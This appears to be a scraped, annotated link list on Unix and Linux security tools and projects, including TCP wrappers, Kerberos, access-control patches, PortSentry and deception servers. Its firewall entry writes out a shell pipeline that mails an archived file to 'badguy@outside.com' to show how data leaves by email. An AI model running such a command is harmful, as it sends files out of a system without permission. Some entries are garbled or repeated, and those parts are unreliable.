There happen to be security problems with Unix-based systems fundamentally because:
Securing computer systems is a nontrivial task, and
Unix systems do get challenged when they are used for applications needing security.
People do not (or at least should not) use PC operating systems like MS-DOS or Windows 95 for applications that require information security, as they are extremely insecure for such purposes. (They have never been officially rated, but would fall into "D" level were there certifications for that level.) Microsoft is not a vendor of secure operating systems, even at their best. Windows NT is only secure for such purposes (e.g. - "C2 Certified") if:
You run the particular Compaq or Digital hardware models specified by NIST,
You run the particular version of Windows NT (3.50, I believe) specified by NIST,
You remove the floppy drive from the computer, and
You remove network connectivity, and
You configure Windows NT as specified by NIST.
Windows NT is largely useless for anything other than a network server, and thus removal of network connectivity makes it useless.
You can secure virtually any computer if you encase it in lead and concrete and place it at the bottom of the ocean. The computer is not likely to be too useful under such conditions, though.
A more recent security evaluation has been done; it may be best understood by making reference to Understanding the Windows EAL4 Evaluation which tells us:
Security experts have been saying for years that the security of the Windows family of products is hopelessly inadequate. Now there is a rigorous government certification confirming this.
ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist
This represents the software making up catiocation> tcpd secures and monitors incoming service requests, providing a security layer wrapped around the network services defined in /etc/services. Accesses may be logged, permitted, denied, redirected, all in a fashion transparent to the outside user.
Network Associates: Vendors of TIS Firewall Toolkit
Trusted Internet Systems provides a freely usable (but not GNUed) set of tools for building firewalls. The design approach involves using trustable components to ensure that correctness can be verified both at component levels and at the "whole system" level. The source code has got to be reviewable by the security team in order to verify that there are no "trap doors."
There's enough flexibility in the TIS tools that security can be made restrictive ("fascist") when necessary and also more permissive as appropriate. There's little sense in forbidding outgoing FTP connections, for instance, if outgoing mail is permitted. If a user wants to send data outside (and they have mail access), they can always turn it into email and mail it out: echo 'filename' | cpio -o | uuencode filename.cpio | \ mail -s 'security breach' badguy@outside.com
SafeTP - Uses cryptographic connection negotiation to provide a secure alternative interoperable with FTP
Particularly directed to clarify terms used in the context of information security. Its definition of the word hacker is quite interesting.
A pretty decent introduction to security-related terminology.
Harris Computer Systems Corporation CX/SX Version 6.1.1 B1 Rating
Note that: "CX/SX is designed to be software compatible with CX/UX while adding additional security features. CX/SX provides the traditional Unix user-specified access controls of protection bits for discretionary access control. "
VTun Virtual Tunnels over TCP/IP
If you want to have a secure network connection from one spot to another, and can only use the insecure Internet, then use this, to route traffic (encrypted) from one host, at one end, to the other host, at the other end. The point of the exercise is to make the tunnel invisible to client machines on the LAN; they don't know that the "tunnel" is there...
A B3 secure OS which has a Multics-like security model, segmented demand paged VM, and a multi-layer ring structure isolation mechanism. It provides a Unix API; an upcoming version is planned to provide a Linux-compatible API.
Kerberos is a distributed authentication system originally developed at MIT. It allows users and services to authenticate themselves to one another. It uses strong cryptography to transmit authentication tickets that allow users to assert their identities in an unequivocal manner to services in order to gain access.
Once the user logs in, and is authenticated by some scheme (password or otherwise), they can then request "tickets" for access to some service from an authentication server, which can then be submitted to the service to establish access permission.
Tickets have a limited lifetime; they may be used for an extended period of time, thus limiting the number of "ticket requests" that have to be made, but since the time is limited, a nefarious interloper does not have an unlimited time in which they might attempt to use a "stolen ticket."
A number of pieces of network-related software running on Unix are "Kerberized;" this means that you may (perhaps optionally) authenticate access using Kerberos rather than via the traditional "UserID/Password" combination. This commonly includes telnet, the Unix "rlogin" tool suite, and X11. Some commercial software, including SAP R/3 , can use Kerberos as the authentication protocol.
A number of vendors sell libraries to integrate Kerberos authentication support into Unix and Windows applications.
There are parallels between the use of Kerberos and that of SSL ; there is a useful comparison here.
Designing an Authentication System: A Dialogue in Four Scenes
This essay explains Kerberos protocol in "plain English"
Most of the design work associated with this will deal with the user tools (including packaging tools like RPM or dpkg), as it is useless to have sophisticated security components without sufficiently powerful tools to manage it...
Including a fairly decent two page Quick Reference Guide...
POSIX Access Control Lists (ACLs) for Linux
This is an effort to implement POSIX-like Access Control Lists for Linux.
This project takes an approach similar to the Novell Netware notion of trustees. Trustees are bound to files/directories, and are used to grant/deny access to groups of users.
RSBAC is mostly a big patch for current Linux kernels. It is based on the Generalized Framework for Access Control (GFAC) by Abrams and LaPadula and provides a flexible system of access control based on several modules.
All security relevant system calls are extended by security enforcement code. This code calls the central decision component, which in turn calls all active decision modules and generates a combined decision. This decision is then enforced by the system call extensions.
A general goal of RSBAC is to some day reach Orange Book (TCSEC) B1 level. For this many special problems have been and will have to be addressed.
Linux-Privs - Adding VMS-like Capabilities/Privileges to Linux
Maximum Linux Security : A Hacker's Guide to Protecting Your Linux Server and Worstation
A discussion of security tips:
With the thought to simply slow down an attack, here are some more things that can be put to good use:
| ||
| --Randall Raemon | ||
FreeVSD - Virtual Server Daemon
FreeVSD enables many 'Linux platforms' on a single physical server, each identical to the main Linux directory structure; each Virtual Server has its own IP address and view of the process table, allowing web servers and other applications to be deployed and administered discretely, without compromise to security.
VXE - Virtual eXecuting Environment
VXE (Virtual eXecuting Environment) protects Unix servers from intruders, hacker attacks from network and so on. It protects software subsystems, such as: SMTP, POP, HTTP and any other subsystem, already installed on the server.
VXE description (VXED) is small LISP program (set of functions) which use declarative description of acceptable parameters for different system calls. This VXED loaded to the kernel, controls system calls parameters from the specified subsystem. So VXEDs are dynamically loadable modules, handled by the small LISP interpreter, inserted into the kernel. In current VXE version, this is vxelisp, derived from RefLisp. vxelisp has new internal bigstring representation, full set of string and bit functions. The kernel version of vxelisp is reentrant, to handle different VXEDs simultaneously.
Yahoo - National Security Agency Selects Secure Computing to Provide Type Enforcement on Linux
This is effectively an outgrowth of the Flask security architecture, continuing the efforts of the Distributed Trusted Operating System (DTOS) Project.
Sentry is a program that protects computers running linux from various break-in attempts and assaults. It does this by dropping the IP addresses of the attackers into the computer's /etc/hosts.deny file when it detects a port scan.
To detect a port scan, Sentry binds itself to various ports that are not in use and are specified by the sentry.conf file in one's /etc directory.
When an attacker performs a scan on one of these ports, they are immediately added to the hosts.deny file and then dropped via tcp wrappers onto a dead, non-existent host like 333.444.555.666.
Sentry has proven extremely effective against assaults. To give anecdotal evidence, a friend of mine who runs linux and uses sentry has now accumulated a 2 megabyte hosts.deny file.
Amongst other measures, I run portsentry, and have a sizable list of blocked hosts.
Using deception to counter security attacks. Essentially, leaving apparent vulnerabilities to catch would-be attackers off-guard, lulling them into a false sense of security in your apparent insecurity.
You might, for instance, create a fake service 25 for Sendmail that makes it appear that you're running a terribly insecure version, whilst reality is that you are toying with the attacker, collecting information on them.
One cute idea they have is to have a pseudo-Sendmail tie up spam producers; if a request comes in from a known spam producer, you might accept the connection, and respond with a stream such as
250-This is Sendmail version 8.8.5 |
Note that this is not an attack; it is only initiated if they decide to connect to your server.
It is a bit of a paradox to slow down Internet connections in order to use them better, but at least is an entertaining paradox...
Linux Intrusion Detection System
A patch which enhances the kernel's security
SUBTERFUGUE is a framework for observing and playing with the reality of software; it's a foundation for building tools to do tracing, sandboxing, and many other things. You could think of it as "strace meets expect."
lokkit - Firewall Configuration tool for GNOME by Alan Cox
Providing a hopefully-tidy way of getting at information about:
Security advisories
Articles on security
Maker of Pitbull, a secure platform certified at the B1 level, which presently runs atop Solaris, and which will soon run atop Linux .
oss.sgi.com - B1 Sample Source Code
This source code provides a sample implementation of a B1 rated trusted system.
The code has been extracted from the Trusted Irix product and provides an implementation of Mandatory Access Control (MAC), Capabilities, Access Control Lists (ACLs), an Audit Trail and supporting networking code, such as netinet, netstat, nfs.
SUBTERFUGUE is a framework for observing and playing with the reality of software; it's a foundation for building tools to do tracing, sandboxing, and many other things. You could think of it as "strace meets expect ." Written using Python .
LOMAC is a security enhancement for Linux that uses Low Water-Mark Mandatory Access Control to protect the integrity of processes and data from viruses, Trojan horses, malicious remote users, and compromised root daemons. LOMAC is implemented as a loadable kernel module - no kernel recompilations or changes to existing applications are required. Although some features and fixes remain to be implemented, LOMAC presently provides sufficient protection to thwart script-kiddies, and is stable enough for everyday use.
Generating a random password:
head -c 6 /dev/random | mmencode
This takes the interesting approach of running some OS kernel like Linux, getting it up and running far enough to run some firewall configuration with ipchains and the likes, and then halting all of userspace. In essence... shutdown -h now.
The kernel stays running, in a "runlevel 0" mode, and passes through network traffic as configured by ipchains, but there are no services running that could conceivably get "hacked."
Data Hiding and Forensics on Linux
A discussion about when file data really goes away on Linux, and of how you might:
Recover data that appears to be gone;
Try to ensure that data that you think has been deleted is truly no longer available on disk.
SASL - Simple Authentication and Security Layer
A method for adding authentication support to connection-oriented protocols. It can manage authentication using a variety of existing mechanisms, including Kerberos. A natural extension is to also use some encryption scheme such as AES or Blowfish to encrypt transmissions.
Projects using SASL include IMAP servers, LDAP servers, with others likely in the future.
Configuring an IPSec Tunnel Between a Linux PC with the VPN 3000 Client and VPN 3000 Concentrator
GNOME client for Nessus security tool
A dynamic variation on IPSEC
ENTROPY stands for Emerging Network To Reduce Orwellian Potency Yield